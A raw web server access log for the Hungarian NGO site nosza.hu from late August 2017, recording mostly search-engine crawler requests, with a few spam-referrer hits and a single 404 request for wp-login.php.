46.118.158.19 - - [30/Aug/2017:18:06:21 +0200] "GET /new/en/ HTTP/1.1" 200 9179 "http://03e.info/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer)"
46.118.158.19 - - [30/Aug/2017:18:06:22 +0200] "GET /new/en/ HTTP/1.1" 200 9179 "http://03e.info/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer)"
207.46.13.60 - - [30/Aug/2017:18:23:52 +0200] "GET /new/sites/default/files/Onkentesseg.pdf HTTP/1.1" 200 634194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
77.75.79.54 - - [30/Aug/2017:18:30:01 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)"
77.75.79.54 - - [30/Aug/2017:18:30:01 +0200] "GET /angol/EESCconf/index.html HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)"
216.244.66.247 - - [30/Aug/2017:18:32:42 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
216.244.66.247 - - [30/Aug/2017:18:33:49 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
216.244.66.200 - - [30/Aug/2017:18:35:33 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
157.55.39.145 - - [30/Aug/2017:18:43:40 +0200] "GET / HTTP/1.1" 200 1010 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.55.210.121 - - [30/Aug/2017:18:49:33 +0200] "GET /new/modules/filefield/filefield.css?L HTTP/1.1" 200 1986 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
199.30.25.117 - - [30/Aug/2017:18:49:34 +0200] "GET /new/modules/node/node.css?L HTTP/1.1" 200 740 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
199.30.24.132 - - [30/Aug/2017:18:49:35 +0200] "GET /new/modules/system/defaults.css?L HTTP/1.1" 200 757 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
65.55.210.105 - - [30/Aug/2017:18:49:36 +0200] "GET /new/modules/system/system.css?L HTTP/1.1" 200 10020 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
199.30.24.213 - - [30/Aug/2017:18:49:37 +0200] "GET /new/modules/system/system-menus.css?L HTTP/1.1" 200 935 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
199.30.25.117 - - [30/Aug/2017:18:49:37 +0200] "GET /new/modules/user/user.css?L HTTP/1.1" 200 1127 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
199.30.24.98 - - [30/Aug/2017:18:49:38 +0200] "GET /new/sites/all/modules/cck/theme/content-module.css?L HTTP/1.1" 200 2397 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
65.55.210.121 - - [30/Aug/2017:18:49:40 +0200] "GET /new/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css?L HTTP/1.1" 200 166 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
199.30.25.31 - - [30/Aug/2017:18:49:41 +0200] "GET /new/sites/default/themes/nosza/css/nosza.css?L HTTP/1.1" 200 10555 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
199.30.24.98 - - [30/Aug/2017:18:49:42 +0200] "GET /new/sites/default/themes/nosza/scripts/search.js HTTP/1.1" 200 466 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
65.55.210.105 - - [30/Aug/2017:18:49:43 +0200] "GET /new/sites/default/themes/nosza/css/menu_style.css HTTP/1.1" 200 4749 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
131.253.25.128 - - [30/Aug/2017:19:03:24 +0200] "GET /new/ HTTP/1.1" 200 9565 "http://www.nosza.hu/" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
131.253.25.128 - - [30/Aug/2017:19:03:26 +0200] "GET /new/sites/default/themes/nosza/images/logo.jpg HTTP/1.1" 200 5329 "http://www.nosza.hu/new/" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
131.253.25.128 - - [30/Aug/2017:19:03:28 +0200] "GET /new/sites/default/themes/nosza/images/rrs.jpg HTTP/1.1" 200 829 "http://www.nosza.hu/new/" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
131.253.25.128 - - [30/Aug/2017:19:03:28 +0200] "GET /new/sites/default/themes/nosza/images/headerBg.jpg HTTP/1.1" 200 11316 "http://www.nosza.hu/new/" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
131.253.25.128 - - [30/Aug/2017:19:03:33 +0200] "GET /new/sites/default/themes/nosza/images/searchBg.png HTTP/1.1" 200 1443 "http://www.nosza.hu/new/" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
131.253.25.128 - - [30/Aug/2017:19:03:33 +0200] "GET /new/sites/default/themes/nosza/images/magyarBgInactive.png HTTP/1.1" 200 686 "http://www.nosza.hu/new/" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
131.253.25.128 - - [30/Aug/2017:19:03:33 +0200] "GET /new/sites/default/themes/nosza/images/magyarBgOver.png HTTP/1.1" 200 893 "http://www.nosza.hu/new/" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
131.253.25.128 - - [30/Aug/2017:19:03:33 +0200] "GET /new/sites/default/themes/nosza/images/englishBgInactive.png HTTP/1.1" 200 823 "http://www.nosza.hu/new/" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
131.253.25.128 - - [30/Aug/2017:19:03:33 +0200] "GET /new/sites/default/themes/nosza/images/feelingBg.jpg HTTP/1.1" 200 25836 "http://www.nosza.hu/new/" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
131.253.25.128 - - [30/Aug/2017:19:03:33 +0200] "GET /new/sites/default/themes/nosza/images/egyIcon.jpg HTTP/1.1" 200 860 "http://www.nosza.hu/new/" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
131.253.25.128 - - [30/Aug/2017:19:03:33 +0200] "GET /new/sites/default/themes/nosza/images/kettoIcon.jpg HTTP/1.1" 200 1039 "http://www.nosza.hu/new/" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
131.253.25.128 - - [30/Aug/2017:19:03:34 +0200] "GET /new/sites/default/themes/nosza/images/haromIcon.jpg HTTP/1.1" 200 764 "http://www.nosza.hu/new/" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
131.253.25.128 - - [30/Aug/2017:19:03:34 +0200] "GET /new/sites/default/themes/nosza/images/otIcon.jpg HTTP/1.1" 200 689 "http://www.nosza.hu/new/" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
131.253.25.128 - - [30/Aug/2017:19:03:34 +0200] "GET /new/sites/default/themes/nosza/images/negyIcon.jpg HTTP/1.1" 200 908 "http://www.nosza.hu/new/" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
131.253.25.128 - - [30/Aug/2017:19:03:34 +0200] "GET /new/sites/default/themes/nosza/images/hatIcon.jpg HTTP/1.1" 200 838 "http://www.nosza.hu/new/" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
131.253.25.128 - - [30/Aug/2017:19:03:34 +0200] "GET /new/sites/default/themes/nosza/images/akualitasBg.jpg HTTP/1.1" 200 26955 "http://www.nosza.hu/new/" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
131.253.25.128 - - [30/Aug/2017:19:03:35 +0200] "GET /new/sites/default/themes/nosza/images/h3Bg.png HTTP/1.1" 200 323 "http://www.nosza.hu/new/" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
131.253.25.128 - - [30/Aug/2017:19:03:35 +0200] "GET /new/sites/default/themes/nosza/images/datumBg.png HTTP/1.1" 200 561 "http://www.nosza.hu/new/" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
131.253.25.128 - - [30/Aug/2017:19:03:35 +0200] "GET /new/sites/default/themes/nosza/images/dossziekBg.jpg HTTP/1.1" 200 25230 "http://www.nosza.hu/new/" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
131.253.25.128 - - [30/Aug/2017:19:03:35 +0200] "GET /new/sites/default/themes/nosza/images/publikaciokBg.jpg HTTP/1.1" 200 21084 "http://www.nosza.hu/new/" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
131.253.25.128 - - [30/Aug/2017:19:03:36 +0200] "GET /new/sites/default/themes/nosza/images/footerBg.jpg HTTP/1.1" 200 1097 "http://www.nosza.hu/new/" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b"
216.244.66.200 - - [30/Aug/2017:19:09:59 +0200] "GET /new/hirek/2016 HTTP/1.1" 200 16528 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
77.75.79.62 - - [30/Aug/2017:19:15:28 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)"
77.75.79.62 - - [30/Aug/2017:19:15:29 +0200] "GET /new/sites/default/themes/nosza/images/aktualisSide.jpg HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)"
216.244.66.247 - - [30/Aug/2017:19:23:52 +0200] "GET /new/elerhetoseg HTTP/1.1" 200 7734 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
216.244.66.247 - - [30/Aug/2017:19:26:28 +0200] "GET /new/projektek/civil-%C3%BAjs%C3%A1g%C3%ADr%C3%A1ssal-az-%C3%B6nkorm%C3%A1nzatok-%C3%A1tl%C3%A1that%C3%B3s%C3%A1g%C3%A1%C3%A9rt HTTP/1.1" 200 10411 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
216.244.66.247 - - [30/Aug/2017:19:27:37 +0200] "GET /halozatok/JMCS/tagok/index.html HTTP/1.1" 200 65034 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
216.244.66.200 - - [30/Aug/2017:19:29:53 +0200] "GET /konferenciak/2konferencia/2resztvevok/index.html HTTP/1.1" 200 150584 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
40.77.167.0 - - [30/Aug/2017:19:49:13 +0200] "GET /new/hirek HTTP/1.1" 200 16534 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.0 - - [30/Aug/2017:20:13:52 +0200] "GET /new/hirek/2009 HTTP/1.1" 200 16528 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
77.75.79.54 - - [30/Aug/2017:20:15:36 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)"
77.75.79.54 - - [30/Aug/2017:20:15:46 +0200] "GET /new/sites/default/themes/nosza/images/dosszieSide.jpg HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)"
216.244.66.200 - - [30/Aug/2017:20:30:30 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
157.55.39.145 - - [30/Aug/2017:20:40:33 +0200] "GET / HTTP/1.1" 200 1010 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
46.118.113.254 - - [30/Aug/2017:20:57:54 +0200] "GET /new/en/ HTTP/1.1" 200 9179 "https://bioscorp.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01"
46.118.113.254 - - [30/Aug/2017:20:57:54 +0200] "GET /new/en/ HTTP/1.1" 200 9179 "https://bioscorp.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01"
46.118.113.254 - - [30/Aug/2017:20:57:54 +0200] "GET /new/en/ HTTP/1.1" 200 9179 "https://bioscorp.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01"
216.244.66.200 - - [30/Aug/2017:20:58:30 +0200] "GET /new/hirek/dossziek?page=1 HTTP/1.1" 200 12246 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
216.244.66.200 - - [30/Aug/2017:21:17:17 +0200] "GET /new/projektek/h%C3%A1l%C3%B3zat-nyitott-jogalkot%C3%A1s%C3%A9rt HTTP/1.1" 200 9573 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
216.244.66.200 - - [30/Aug/2017:21:18:29 +0200] "GET /3kutat/NOSZA2002/index.html HTTP/1.1" 200 23392 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
216.244.66.247 - - [30/Aug/2017:21:19:11 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
216.244.66.200 - - [30/Aug/2017:21:19:35 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
40.77.167.0 - - [30/Aug/2017:21:24:57 +0200] "GET /new/sites/default/files/polish%20final.doc HTTP/1.1" 200 1365504 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.64.21 - - [30/Aug/2017:21:35:13 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.21 - - [30/Aug/2017:21:35:14 +0200] "GET /kutat/REVkutatas/4projektek/ HTTP/1.1" 200 68956 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
46.118.113.254 - - [30/Aug/2017:21:41:44 +0200] "GET /new/en/ HTTP/1.1" 200 9179 "http://pornolook.net/" "Opera/9.01 (Windows NT 5.1; U; en)"
46.118.113.254 - - [30/Aug/2017:21:41:44 +0200] "GET /new/en/ HTTP/1.1" 200 9179 "http://pornolook.net/" "Opera/9.01 (Windows NT 5.1; U; en)"
216.244.66.247 - - [30/Aug/2017:22:08:25 +0200] "GET /aktualis/104eitv/index.html HTTP/1.1" 200 94846 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
216.244.66.247 - - [30/Aug/2017:22:09:01 +0200] "GET /aktualis/105onk/onkentes/index.html HTTP/1.1" 200 24562 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
216.244.66.200 - - [30/Aug/2017:22:11:30 +0200] "GET /new/hirek/publikaciok HTTP/1.1" 200 16786 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
216.244.66.200 - - [30/Aug/2017:22:11:54 +0200] "GET /new/hirek/nosza-egyes%C3%BClet-m%C3%A1t%C3%B3l-hivatalosan-freedom-information-advocates-network-foianet-tagja HTTP/1.1" 200 8671 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
151.80.39.10 - - [30/Aug/2017:22:53:21 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)"
217.182.132.27 - - [30/Aug/2017:22:53:27 +0200] "GET /new/dossziek HTTP/1.1" 200 9412 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)"
66.249.73.18 - - [30/Aug/2017:22:55:48 +0200] "GET /new/magunkrol/tagjaink?page=1 HTTP/1.1" 200 10123 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.18 - - [30/Aug/2017:23:02:05 +0200] "GET /kutat/REVkutatas/1gazdasag/ HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.22 - - [30/Aug/2017:23:03:00 +0200] "GET /kutat/REVkutatas/ HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.18 - - [30/Aug/2017:23:03:42 +0200] "GET /new/sites/default/files/Szervezeti.pdf HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.244.66.200 - - [30/Aug/2017:23:04:44 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
66.249.73.22 - - [30/Aug/2017:23:06:24 +0200] "GET /new/sites/default/files/Onkentesseg.pdf HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.20 - - [30/Aug/2017:23:06:58 +0200] "GET /nizak-peterfi.dbk.pdf HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.20 - - [30/Aug/2017:23:10:50 +0200] "GET /szervezet/index.html HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.22 - - [30/Aug/2017:23:26:58 +0200] "GET /new/sites/default/files/Egyes%C3%BClet_ujPtk.pdf HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.20 - - [30/Aug/2017:23:30:42 +0200] "GET /kutat/REVkutatas/5PR/index.html HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.20 - - [30/Aug/2017:23:31:18 +0200] "GET / HTTP/1.1" 200 1010 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.22 - - [30/Aug/2017:23:37:12 +0200] "GET /kutat/REVkutatas/4projektek/index.html HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
40.77.167.0 - - [30/Aug/2017:23:43:45 +0200] "GET /aktualis/1gyikNCA/elektor/index.html HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.73.22 - - [30/Aug/2017:23:46:19 +0200] "GET /new/dossziek/hirek HTTP/1.1" 200 8103 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.244.66.200 - - [30/Aug/2017:23:46:20 +0200] "GET /new/hirek/hirek HTTP/1.1" 200 16616 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
66.249.73.18 - - [30/Aug/2017:23:49:29 +0200] "GET /new/elerhetoseg HTTP/1.1" 200 7734 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.244.66.200 - - [31/Aug/2017:00:01:58 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
188.153.81.249 - - [31/Aug/2017:00:10:09 +0200] "GET /wp-login.php HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
188.153.81.249 - - [31/Aug/2017:00:10:09 +0200] "GET / HTTP/1.1" 200 1010 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
66.249.73.18 - - [31/Aug/2017:00:11:15 +0200] "GET /kutat/REVkutatas/1gazdasag/ HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.18 - - [31/Aug/2017:00:13:12 +0200] "GET /kutat/REVkutatas/ HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.20 - - [31/Aug/2017:00:13:23 +0200] "GET /new/sites/default/files/Szervezeti.pdf HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.69.133.236 - - [31/Aug/2017:00:13:38 +0200] "GET /robots.txt HTTP/1.0" 404 1181 "-" "Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)"
217.69.133.234 - - [31/Aug/2017:00:13:47 +0200] "GET /new/en/about_us/supporters HTTP/1.1" 200 7950 "-" "Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)"
66.249.73.22 - - [31/Aug/2017:00:15:46 +0200] "GET /new/sites/default/files/Onkentesseg.pdf HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.20 - - [31/Aug/2017:00:16:09 +0200] "GET /nizak-peterfi.dbk.pdf HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.255.64.106 - - [31/Aug/2017:00:18:36 +0200] "GET /aktualis/109kozigazg/index.html HTTP/1.1" 200 7627 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)"
180.76.15.30 - - [31/Aug/2017:00:25:55 +0200] "GET /new/sites/default/files/bevezeto.pdf HTTP/1.1" 200 524288 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
151.80.27.118 - - [31/Aug/2017:00:31:26 +0200] "GET /konferenciak/07egszbbesz/07egszbpr/egszbreg/index.html HTTP/1.1" 200 181901 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)"
66.249.73.18 - - [31/Aug/2017:00:39:50 +0200] "GET /new/magunkrol/tagjaink HTTP/1.1" 200 17173 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.20 - - [31/Aug/2017:00:40:14 +0200] "GET /new/hirek/nosza-egyes%C3%BClet-%C3%A9s-f%C3%BCggetlen-m%C3%A9diak%C3%B6zpont-sikeres-p%C3%A1ly%C3%A1zatott-ny%C3%BAjtott-be-norv%C3%A9g-civil-t%C3%A1mogat HTTP/1.1" 200 9153 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.20 - - [31/Aug/2017:00:42:40 +0200] "GET / HTTP/1.1" 200 1010 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.22 - - [31/Aug/2017:00:43:13 +0200] "GET /new/ HTTP/1.1" 200 9565 "http://www.nosza.hu/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
